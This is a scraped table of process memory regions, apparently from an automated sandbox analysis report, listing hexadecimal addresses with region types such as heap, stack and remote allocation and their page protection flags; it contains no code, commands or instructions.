|
||
|
11F972D5000
|
heap
|
page read and write
|
||
|
23165F61000
|
heap
|
page read and write
|
||
|
814B000
|
stack
|
page read and write
|
||
|
24420000
|
heap
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
23165F7E000
|
heap
|
page read and write
|
||
|
2459F000
|
stack
|
page read and write
|
||
|
10FDDE000
|
stack
|
page read and write
|
||
|
7FF848CD0000
|
trusted library allocation
|
page read and write
|
||
|
80B5000
|
trusted library allocation
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
11F995DE000
|
trusted library allocation
|
page read and write
|
||
|
27690000
|
trusted library allocation
|
page read and write
|
||
|
2FC2000
|
trusted library allocation
|
page read and write
|
||
|
11F98F4B000
|
heap
|
page read and write
|
||
|
26A1F000
|
heap
|
page read and write
|
||
|
721E000
|
stack
|
page read and write
|
||
|
27540000
|
trusted library allocation
|
page read and write
|
||
|
24718000
|
trusted library allocation
|
page read and write
|
||
|
810C000
|
stack
|
page read and write
|
||
|
2685E000
|
stack
|
page read and write
|
||
|
4605000
|
remote allocation
|
page execute and read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
268B0000
|
trusted library allocation
|
page read and write
|
||
|
23167F36000
|
heap
|
page read and write
|
||
|
F20000
|
heap
|
page read and write
|
||
|
23167EF6000
|
heap
|
page read and write
|
||
|
26970000
|
heap
|
page read and write
|
||
|
23167EB1000
|
heap
|
page read and write
|
||
|
6FB2000
|
heap
|
page read and write
|
||
|
23167EB7000
|
heap
|
page read and write
|
||
|
276A0000
|
trusted library allocation
|
page read and write
|
||
|
26A66000
|
heap
|
page read and write
|
||
|
23165F2E000
|
heap
|
page read and write
|
||
|
275A0000
|
trusted library allocation
|
page read and write
|
||
|
4FF6000
|
trusted library allocation
|
page read and write
|
||
|
11FA9327000
|
trusted library allocation
|
page read and write
|
||
|
11F994C6000
|
trusted library allocation
|
page read and write
|
||
|
11F98E80000
|
heap
|
page read and write
|
||
|
7E1D000
|
stack
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
5536EFA000
|
stack
|
page read and write
|
||
|
247E1000
|
trusted library allocation
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
24831000
|
trusted library allocation
|
page read and write
|
||
|
23167EB4000
|
heap
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
268A0000
|
trusted library allocation
|
page read and write
|
||
|
241EE000
|
stack
|
page read and write
|
||
|
23167EE2000
|
heap
|
page read and write
|
||
|
24520000
|
remote allocation
|
page read and write
|
||
|
8B8A000
|
heap
|
page read and write
|
||
|
6405000
|
remote allocation
|
page execute and read and write
|
||
|
45CE000
|
stack
|
page read and write
|
||
|
23165F36000
|
heap
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
7DD0000
|
trusted library allocation
|
page read and write
|
||
|
7EA0000
|
trusted library allocation
|
page read and write
|
||
|
23167F36000
|
heap
|
page read and write
|
||
|
23165F6D000
|
heap
|
page read and write
|
||
|
11FB1567000
|
heap
|
page execute and read and write
|
||
|
1100FE000
|
stack
|
page read and write
|
||
|
EA0000
|
trusted library section
|
page read and write
|
||
|
7F50000
|
trusted library allocation
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
11F99F59000
|
trusted library allocation
|
page read and write
|
||
|
26D2E000
|
stack
|
page read and write
|
||
|
8C20000
|
direct allocation
|
page read and write
|
||
|
7320000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
23D00000
|
direct allocation
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
27560000
|
trusted library allocation
|
page read and write
|
||
|
1113CB000
|
stack
|
page read and write
|
||
|
23167EB2000
|
heap
|
page read and write
|
||
|
8AA0000
|
heap
|
page read and write
|
||
|
71D0000
|
heap
|
page read and write
|
||
|
44F0000
|
trusted library allocation
|
page read and write
|
||
|
729E000
|
stack
|
page read and write
|
||
|
23167F37000
|
heap
|
page read and write
|
||
|
27550000
|
trusted library allocation
|
page read and write
|
||
|
7F30000
|
heap
|
page read and write
|
||
|
242A0000
|
trusted library allocation
|
page read and write
|
||
|
1112CD000
|
stack
|
page read and write
|
||
|
7FF848E02000
|
trusted library allocation
|
page read and write
|
||
|
27690000
|
trusted library allocation
|
page read and write
|
||
|
8DA0000
|
direct allocation
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
7380000
|
trusted library allocation
|
page read and write
|
||
|
23167EE5000
|
heap
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
11F9730F000
|
heap
|
page read and write
|
||
|
6EBE000
|
stack
|
page read and write
|
||
|
23167ECC000
|
heap
|
page read and write
|
||
|
245B0000
|
direct allocation
|
page read and write
|
||
|
A175000
|
direct allocation
|
page execute and read and write
|
||
|
24887000
|
trusted library allocation
|
page read and write
|
||
|
23167EB9000
|
heap
|
page read and write
|
||
|
5659000
|
trusted library allocation
|
page read and write
|
||
|
69EF000
|
stack
|
page read and write
|
||
|
7DB0000
|
heap
|
page read and write
|
||
|
24520000
|
remote allocation
|
page read and write
|
||
|
11F973E0000
|
heap
|
page read and write
|
||
|
27652000
|
trusted library allocation
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
23165FAF000
|
heap
|
page read and write
|
||
|
6B40000
|
direct allocation
|
page read and write
|
||
|
11FB1920000
|
heap
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
5EB000
|
heap
|
page read and write
|
||
|
268EC000
|
stack
|
page read and write
|
||
|
27690000
|
trusted library allocation
|
page read and write
|
||
|
275A0000
|
trusted library allocation
|
page read and write
|
||
|
11F9B23E000
|
trusted library allocation
|
page read and write
|
||
|
8B8C000
|
heap
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
11F99F94000
|
trusted library allocation
|
page read and write
|
||
|
2FC7000
|
trusted library allocation
|
page execute and read and write
|
||
|
23D30000
|
direct allocation
|
page read and write
|
||
|
8400000
|
trusted library allocation
|
page execute and read and write
|
||
|
8B1A000
|
heap
|
page read and write
|
||
|
269B3000
|
heap
|
page read and write
|
||
|
2481F000
|
trusted library allocation
|
page read and write
|
||
|
276B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
276A0000
|
trusted library allocation
|
page read and write
|
||
|
8B0000
|
heap
|
page read and write
|
||
|
8DC0000
|
heap
|
page read and write
|
||
|
8450000
|
direct allocation
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E07000
|
trusted library allocation
|
page read and write
|
||
|
11F9B14E000
|
trusted library allocation
|
page read and write
|
||
|
23165F35000
|
heap
|
page read and write
|
||
|
23167F36000
|
heap
|
page read and write
|
||
|
8226000
|
heap
|
page read and write
|
||
|
7117000
|
heap
|
page read and write
|
||
|
81E0000
|
heap
|
page read and write
|
||
|
8BE2000
|
heap
|
page read and write
|
||
|
275A0000
|
trusted library allocation
|
page read and write
|
||
|
276A0000
|
trusted library allocation
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
240D0000
|
heap
|
page read and write
|
||
|
23165F35000
|
heap
|
page read and write
|
||
|
11F994BB000
|
trusted library allocation
|
page read and write
|
||
|
84B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6B10000
|
direct allocation
|
page read and write
|
||
|
23165EC0000
|
heap
|
page read and write
|
||
|
2316827F000
|
heap
|
page read and write
|
||
|
11F9ADD0000
|
trusted library allocation
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
23165F47000
|
heap
|
page read and write
|
||
|
27680000
|
trusted library allocation
|
page read and write
|
||
|
27520000
|
trusted library allocation
|
page read and write
|
||
|
EEA000
|
trusted library allocation
|
page execute and read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
275A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C3B000
|
trusted library allocation
|
page read and write
|
||
|
7F40000
|
trusted library allocation
|
page read and write
|
||
|
11F974B0000
|
heap
|
page execute and read and write
|
||
|
6D80000
|
heap
|
page read and write
|
||
|
11FA9031000
|
trusted library allocation
|
page read and write
|
||
|
2455E000
|
stack
|
page read and write
|
||
|
11F99258000
|
trusted library allocation
|
page read and write
|
||
|
11F99922000
|
trusted library allocation
|
page read and write
|
||
|
2FCB000
|
trusted library allocation
|
page execute and read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
275A0000
|
trusted library allocation
|
page read and write
|
||
|
23165F7E000
|
heap
|
page read and write
|
||
|
276A0000
|
trusted library allocation
|
page read and write
|
||
|
275A0000
|
trusted library allocation
|
page read and write
|
||
|
7370000
|
trusted library allocation
|
page read and write
|
||
|
8222000
|
heap
|
page read and write
|
||
|
26E0D000
|
stack
|
page read and write
|
||
|
7FF848DC0000
|
trusted library allocation
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
11F98F61000
|
heap
|
page read and write
|
||
|
23167F36000
|
heap
|
page read and write
|
||
|
27580000
|
trusted library allocation
|
page read and write
|
||
|
26990000
|
trusted library allocation
|
page read and write
|
||
|
11FB1392000
|
heap
|
page read and write
|
||
|
11F99020000
|
heap
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
26881000
|
trusted library allocation
|
page read and write
|
||
|
23165ED2000
|
heap
|
page read and write
|
||
|
23167F36000
|
heap
|
page read and write
|
||
|
26860000
|
trusted library allocation
|
page read and write
|
||
|
26DAE000
|
stack
|
page read and write
|
||
|
23167EB0000
|
heap
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
7DF4F1480000
|
trusted library allocation
|
page execute and read and write
|
||
|
26F50000
|
trusted library allocation
|
page read and write
|
||
|
7F60000
|
trusted library allocation
|
page read and write
|
||
|
7F2C000
|
stack
|
page read and write
|
||
|
81EA000
|
heap
|
page read and write
|
||
|
5D0000
|
heap
|
page read and write
|
||
|
275A0000
|
trusted library allocation
|
page read and write
|
||
|
1107FB000
|
stack
|
page read and write
|
||
|
45D0000
|
heap
|
page execute and read and write
|
||
|
23167ED2000
|
heap
|
page read and write
|
||
|
8232000
|
heap
|
page read and write
|
||
|
23167D96000
|
heap
|
page read and write
|
||
|
26E8E000
|
stack
|
page read and write
|
||
|
C975000
|
direct allocation
|
page execute and read and write
|
||
|
7FF848CD6000
|
trusted library allocation
|
page read and write
|
||
|
11F9ADB3000
|
trusted library allocation
|
page read and write
|
||
|
11F98FF0000
|
heap
|
page execute and read and write
|
||
|
26F57000
|
trusted library allocation
|
page read and write
|
||
|
6A60000
|
heap
|
page execute and read and write
|
||
|
FAF000
|
stack
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
23167EC7000
|
heap
|
page read and write
|
||
|
275A0000
|
trusted library allocation
|
page read and write
|
||
|
276B0000
|
trusted library allocation
|
page read and write
|
||
|
11F9ADC8000
|
trusted library allocation
|
page read and write
|
||
|
6C6B000
|
stack
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
7FF848CDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
6B30000
|
direct allocation
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
23167EEE000
|
heap
|
page read and write
|
||
|
11F971A0000
|
heap
|
page read and write
|
||
|
23167EB5000
|
heap
|
page read and write
|
||
|
23165F69000
|
heap
|
page read and write
|
||
|
1103F7000
|
stack
|
page read and write
|
||
|
245D0000
|
trusted library allocation
|
page read and write
|
||
|
275A1000
|
trusted library allocation
|
page read and write
|
||
|
23165F25000
|
heap
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
6B20000
|
direct allocation
|
page read and write
|
||
|
27570000
|
trusted library allocation
|
page read and write
|
||
|
890000
|
heap
|
page read and write
|
||
|
8B8F000
|
heap
|
page read and write
|
||
|
5A9000
|
heap
|
page read and write
|
||
|
55379FC000
|
stack
|
page read and write
|
||
|
7E80000
|
trusted library allocation
|
page execute and read and write
|
||
|
1102FE000
|
stack
|
page read and write
|
||
|
110477000
|
stack
|
page read and write
|
||
|
276A0000
|
trusted library allocation
|
page read and write
|
||
|
11FB1640000
|
heap
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
26980000
|
trusted library allocation
|
page read and write
|
||
|
11037E000
|
stack
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
6E05000
|
remote allocation
|
page execute and read and write
|
||
|
11F99926000
|
trusted library allocation
|
page read and write
|
||
|
83F0000
|
trusted library allocation
|
page read and write
|
||
|
8440000
|
direct allocation
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
276A0000
|
trusted library allocation
|
page read and write
|
||
|
2751D000
|
trusted library allocation
|
page read and write
|
||
|
23167FBA000
|
heap
|
page read and write
|
||
|
275A0000
|
trusted library allocation
|
page read and write
|
||
|
26A59000
|
heap
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
11F9AF3B000
|
trusted library allocation
|
page read and write
|
||
|
23165F5E000
|
heap
|
page read and write
|
||
|
11F99F8B000
|
trusted library allocation
|
page read and write
|
||
|
5A0000
|
heap
|
page read and write
|
||
|
276A0000
|
trusted library allocation
|
page read and write
|
||
|
26866000
|
trusted library allocation
|
page read and write
|
||
|
819E000
|
stack
|
page read and write
|
||
|
275A0000
|
trusted library allocation
|
page read and write
|
||
|
6AAD000
|
stack
|
page read and write
|
||
|
26A1F000
|
heap
|
page read and write
|
||
|
24430000
|
heap
|
page read and write
|
||
|
23167EC2000
|
heap
|
page read and write
|
||
|
5696000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
23165EEF000
|
heap
|
page read and write
|
||
|
276A0000
|
trusted library allocation
|
page read and write
|
||
|
ED9000
|
trusted library allocation
|
page read and write
|
||
|
23165F2E000
|
heap
|
page read and write
|
||
|
2F93000
|
trusted library allocation
|
page execute and read and write
|
||
|
27730000
|
trusted library allocation
|
page read and write
|
||
|
23167F36000
|
heap
|
page read and write
|
||
|
27680000
|
trusted library allocation
|
page read and write
|
||
|
242EE000
|
stack
|
page read and write
|
||
|
2422E000
|
stack
|
page read and write
|
||
|
8B5B000
|
heap
|
page read and write
|
||
|
23165F54000
|
heap
|
page read and write
|
||
|
7FF848DE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
AB75000
|
direct allocation
|
page execute and read and write
|
||
|
11F9A994000
|
trusted library allocation
|
page read and write
|
||
|
23165F61000
|
heap
|
page read and write
|
||
|
6AF0000
|
direct allocation
|
page read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
23165F7E000
|
heap
|
page read and write
|
||
|
23165F2C000
|
heap
|
page read and write
|
||
|
1104F9000
|
stack
|
page read and write
|
||
|
1106F8000
|
stack
|
page read and write
|
||
|
27513000
|
trusted library allocation
|
page read and write
|
||
|
8B83000
|
heap
|
page read and write
|
||
|
8C30000
|
direct allocation
|
page read and write
|
||
|
275AA000
|
trusted library allocation
|
page read and write
|
||
|
8DB0000
|
direct allocation
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
55376FE000
|
stack
|
page read and write
|
||
|
ECD000
|
trusted library allocation
|
page execute and read and write
|
||
|
5536FFE000
|
stack
|
page read and write
|
||
|
11F98C90000
|
trusted library allocation
|
page read and write
|
||
|
23167F36000
|
heap
|
page read and write
|
||
|
245F0000
|
heap
|
page execute and read and write
|
||
|
27540000
|
trusted library allocation
|
page read and write
|
||
|
8DC7000
|
heap
|
page read and write
|
||
|
11F98E25000
|
heap
|
page read and write
|
||
|
9775000
|
direct allocation
|
page execute and read and write
|
||
|
11077E000
|
stack
|
page read and write
|
||
|
ABE000
|
stack
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
11F98EFF000
|
heap
|
page read and write
|
||
|
2426E000
|
stack
|
page read and write
|
||
|
83E0000
|
trusted library allocation
|
page read and write
|
||
|
11F97314000
|
heap
|
page read and write
|
||
|
11F972E7000
|
heap
|
page read and write
|
||
|
1101FD000
|
stack
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
7300000
|
trusted library allocation
|
page read and write
|
||
|
23167EB2000
|
heap
|
page read and write
|
||
|
276A0000
|
trusted library allocation
|
page read and write
|
||
|
23165F5B000
|
heap
|
page read and write
|
||
|
24815000
|
trusted library allocation
|
page read and write
|
||
|
27590000
|
trusted library allocation
|
page read and write
|
||
|
44E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
11F990B6000
|
trusted library allocation
|
page read and write
|
||
|
23167EB7000
|
heap
|
page read and write
|
||
|
5A05000
|
remote allocation
|
page execute and read and write
|
||
|
6A65000
|
heap
|
page execute and read and write
|
||
|
27520000
|
trusted library allocation
|
page read and write
|
||
|
26980000
|
trusted library allocation
|
page read and write
|
||
|
11F997B0000
|
trusted library allocation
|
page read and write
|
||
|
70A0000
|
heap
|
page execute and read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
2482D000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
|
275A0000
|
trusted library allocation
|
page read and write
|
||
|
26D6E000
|
stack
|
page read and write
|
||
|
4788000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
8B8F000
|
heap
|
page read and write
|
||
|
11F97460000
|
trusted library allocation
|
page read and write
|
||
|
23165FA5000
|
heap
|
page read and write
|
||
|
269E3000
|
heap
|
page read and write
|
||
|
4FF2000
|
trusted library allocation
|
page read and write
|
||
|
27531000
|
trusted library allocation
|
page read and write
|
||
|
2432F000
|
stack
|
page read and write
|
||
|
11FB1624000
|
heap
|
page read and write
|
||
|
11F97440000
|
trusted library allocation
|
page read and write
|
||
|
275A0000
|
trusted library allocation
|
page read and write
|
||
|
6D3E000
|
stack
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
11124E000
|
stack
|
page read and write
|
||
|
7FF848C40000
|
trusted library allocation
|
page read and write
|
||
|
EF2000
|
trusted library allocation
|
page read and write
|
||
|
23167EBF000
|
heap
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
23165F40000
|
heap
|
page read and write
|
||
|
8271000
|
heap
|
page read and write
|
||
|
70B0000
|
trusted library allocation
|
page read and write
|
||
|
11FA9319000
|
trusted library allocation
|
page read and write
|
||
|
11FB1570000
|
heap
|
page read and write
|
||
|
275A0000
|
trusted library allocation
|
page read and write
|
||
|
245C0000
|
direct allocation
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
8B10000
|
heap
|
page read and write
|
||
|
7FF848C23000
|
trusted library allocation
|
page execute and read and write
|
||
|
5005000
|
remote allocation
|
page execute and read and write
|
||
|
11F9ADD8000
|
trusted library allocation
|
page read and write
|
||
|
23165F6D000
|
heap
|
page read and write
|
||
|
73A0000
|
trusted library allocation
|
page read and write
|
||
|
275A0000
|
trusted library allocation
|
page read and write
|
||
|
2F90000
|
trusted library allocation
|
page read and write
|
||
|
23167F36000
|
heap
|
page read and write
|
||
|
2759F000
|
stack
|
page read and write
|
||
|
725E000
|
stack
|
page read and write
|
||
|
8F2000
|
heap
|
page read and write
|
||
|
23167A40000
|
heap
|
page read and write
|
||
|
23167EF1000
|
heap
|
page read and write
|
||
|
2412E000
|
stack
|
page read and write
|
||
|
11F98CC0000
|
trusted library allocation
|
page read and write
|
||
|
7F8E000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
275A0000
|
trusted library allocation
|
page read and write
|
||
|
740B000
|
stack
|
page read and write
|
||
|
24520000
|
remote allocation
|
page read and write
|
||
|
11F9ADAE000
|
trusted library allocation
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
276B0000
|
trusted library allocation
|
page read and write
|
||
|
2687E000
|
trusted library allocation
|
page read and write
|
||
|
23167EBE000
|
heap
|
page read and write
|
||
|
23167EDE000
|
heap
|
page read and write
|
||
|
11F97280000
|
heap
|
page read and write
|
||
|
275A1000
|
trusted library allocation
|
page read and write
|
||
|
2FAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
275A0000
|
trusted library allocation
|
page read and write
|
||
|
2416E000
|
stack
|
page read and write
|
||
|
454E000
|
stack
|
page read and write
|
||
|
8C10000
|
direct allocation
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
2FB0000
|
trusted library allocation
|
page read and write
|
||
|
27660000
|
trusted library allocation
|
page execute and read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
23166275000
|
heap
|
page read and write
|
||
|
7FF848C30000
|
trusted library allocation
|
page read and write
|
||
|
8200000
|
heap
|
page read and write
|
||
|
11F9B21F000
|
trusted library allocation
|
page read and write
|
||
|
8470000
|
direct allocation
|
page read and write
|
||
|
2FB2000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C20000
|
trusted library allocation
|
page read and write
|
||
|
11FB1370000
|
heap
|
page read and write
|
||
|
8E6000
|
heap
|
page read and write
|
||
|
23165F4B000
|
heap
|
page read and write
|
||
|
11FA9040000
|
trusted library allocation
|
page read and write
|
||
|
44DE000
|
stack
|
page read and write
|
||
|
2F80000
|
trusted library allocation
|
page read and write
|
||
|
11F972C9000
|
heap
|
page read and write
|
||
|
8B84000
|
heap
|
page read and write
|
||
|
27720000
|
trusted library allocation
|
page read and write
|
||
|
11F995F8000
|
trusted library allocation
|
page read and write
|
||
|
27556000
|
trusted library allocation
|
page read and write
|
||
|
27690000
|
trusted library allocation
|
page read and write
|
||
|
4620000
|
heap
|
page read and write
|
||
|
940000
|
heap
|
page read and write
|
||
|
27530000
|
trusted library allocation
|
page read and write
|
||
|
7F430000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FBA000
|
trusted library allocation
|
page execute and read and write
|
||
|
23165E70000
|
heap
|
page read and write
|
||
|
11F9ADEC000
|
trusted library allocation
|
page read and write
|
||
|
11F99F72000
|
trusted library allocation
|
page read and write
|
||
|
23167F36000
|
heap
|
page read and write
|
||
|
11F9728E000
|
heap
|
page read and write
|
||
|
7390000
|
trusted library allocation
|
page read and write
|
||
|
EC4000
|
trusted library allocation
|
page read and write
|
||
|
70D0000
|
heap
|
page read and write
|
||
|
55371FE000
|
stack
|
page read and write
|
||
|
11F974E5000
|
heap
|
page read and write
|
||
|
11F9B1DE000
|
trusted library allocation
|
page read and write
|
||
|
8C45000
|
heap
|
page read and write
|
||
|
2F94000
|
trusted library allocation
|
page read and write
|
||
|
275A0000
|
trusted library allocation
|
page read and write
|
||
|
B575000
|
direct allocation
|
page execute and read and write
|
||
|
231680D3000
|
heap
|
page read and write
|
||
|
8B00000
|
direct allocation
|
page read and write
|
||
|
23167EB2000
|
heap
|
page read and write
|
||
|
257E1000
|
trusted library allocation
|
page read and write
|
||
|
27540000
|
trusted library allocation
|
page read and write
|
||
|
27570000
|
trusted library allocation
|
page read and write
|
||
|
243BC000
|
stack
|
page read and write
|
||
|
27690000
|
trusted library allocation
|
page read and write
|
||
|
276A0000
|
trusted library allocation
|
page read and write
|
||
|
6CBE000
|
stack
|
page read and write
|
||
|
26886000
|
trusted library allocation
|
page read and write
|
||
|
246CE000
|
stack
|
page read and write
|
||
|
73B0000
|
trusted library allocation
|
page read and write
|
||
|
80C0000
|
trusted library allocation
|
page read and write
|
||
|
2464A000
|
stack
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
27520000
|
trusted library allocation
|
page read and write
|
||
|
4FC000
|
stack
|
page read and write
|
||
|
11F994CE000
|
trusted library allocation
|
page read and write
|
||
|
27550000
|
trusted library allocation
|
page read and write
|
||
|
2F9D000
|
trusted library allocation
|
page execute and read and write
|
||
|
11F99031000
|
trusted library allocation
|
page read and write
|
||
|
2686E000
|
trusted library allocation
|
page read and write
|
||
|
11F9ADC5000
|
trusted library allocation
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
23165F6D000
|
heap
|
page read and write
|
||
|
276C0000
|
trusted library allocation
|
page read and write
|
||
|
8BCA000
|
heap
|
page read and write
|
||
|
11F98D0C000
|
heap
|
page read and write
|
||
|
275A0000
|
trusted library allocation
|
page read and write
|
||
|
23167F36000
|
heap
|
page read and write
|
||
|
23165F68000
|
heap
|
page read and write
|
||
|
26F4F000
|
stack
|
page read and write
|
||
|
23165F54000
|
heap
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
26CED000
|
stack
|
page read and write
|
||
|
27690000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C22000
|
trusted library allocation
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
23165F6D000
|
heap
|
page read and write
|
||
|
27560000
|
trusted library allocation
|
page read and write
|
||
|
11FA9337000
|
trusted library allocation
|
page read and write
|
||
|
276A0000
|
trusted library allocation
|
page read and write
|
||
|
276A0000
|
trusted library allocation
|
page read and write
|
||
|
23167EBD000
|
heap
|
page read and write
|
||
|
7FF848C7C000
|
trusted library allocation
|
page execute and read and write
|
||
|
11F97450000
|
heap
|
page readonly
|
||
|
26E4E000
|
stack
|
page read and write
|
||
|
8AC0000
|
heap
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
11F98E20000
|
heap
|
page read and write
|
||
|
23D10000
|
direct allocation
|
page read and write
|
||
|
4FDC000
|
trusted library allocation
|
page read and write
|
||
|
26F0E000
|
stack
|
page read and write
|
||
|
24417000
|
heap
|
page read and write
|
||
|
24410000
|
heap
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
27520000
|
trusted library allocation
|
page read and write
|
||
|
11F995E3000
|
trusted library allocation
|
page read and write
|
||
|
247C0000
|
trusted library allocation
|
page read and write
|
||
|
23D20000
|
direct allocation
|
page read and write
|
||
|
23165F7E000
|
heap
|
page read and write
|
||
|
27690000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
4470000
|
remote allocation
|
page execute and read and write
|
||
|
27680000
|
trusted library allocation
|
page read and write
|
||
|
26A6F000
|
heap
|
page read and write
|
||
|
8490000
|
direct allocation
|
page read and write
|
||
|
24689000
|
stack
|
page read and write
|
||
|
55370FE000
|
stack
|
page read and write
|
||
|
73C0000
|
trusted library allocation
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
2470F000
|
stack
|
page read and write
|
||
|
6CFE000
|
stack
|
page read and write
|
||
|
4628000
|
heap
|
page read and write
|
||
|
23D50000
|
direct allocation
|
page read and write
|
||
|
11F9B22C000
|
trusted library allocation
|
page read and write
|
||
|
11FB1600000
|
heap
|
page read and write
|
||
|
27520000
|
trusted library allocation
|
page read and write
|
||
|
25809000
|
trusted library allocation
|
page read and write
|
||
|
8B72000
|
heap
|
page read and write
|
||
|
7330000
|
trusted library allocation
|
page read and write
|
||
|
1111CE000
|
stack
|
page read and write
|
||
|
23165F28000
|
heap
|
page read and write
|
||
|
24600000
|
heap
|
page read and write
|
||
|
EF5000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FB6000
|
trusted library allocation
|
page execute and read and write
|
||
|
23167EFC000
|
heap
|
page read and write
|
||
|
8BE5000
|
heap
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
|
276A0000
|
trusted library allocation
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
23165F15000
|
heap
|
page read and write
|
||
|
4448000
|
trusted library allocation
|
page read and write
|
||
|
11F9B21B000
|
trusted library allocation
|
page read and write
|
||
|
275A0000
|
trusted library allocation
|
page read and write
|
||
|
2487F000
|
trusted library allocation
|
page read and write
|
||
|
23167F36000
|
heap
|
page read and write
|
||
|
27510000
|
trusted library allocation
|
page read and write
|
||
|
11007E000
|
stack
|
page read and write
|
||
|
23165F56000
|
heap
|
page read and write
|
||
|
70B8000
|
trusted library allocation
|
page read and write
|
||
|
72F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8420000
|
trusted library allocation
|
page read and write
|
||
|
5631000
|
trusted library allocation
|
page read and write
|
||
|
23167F36000
|
heap
|
page read and write
|
||
|
8AB0000
|
heap
|
page readonly
|
||
|
7F80000
|
trusted library allocation
|
page read and write
|
||
|
11F97380000
|
heap
|
page read and write
|
||
|
4631000
|
trusted library allocation
|
page read and write
|
||
|
23D60000
|
direct allocation
|
page read and write
|
||
|
269F4000
|
heap
|
page read and write
|
||
|
23D40000
|
direct allocation
|
page read and write
|
||
|
AFE000
|
stack
|
page read and write
|
||
|
23166270000
|
heap
|
page read and write
|
||
|
269B0000
|
heap
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
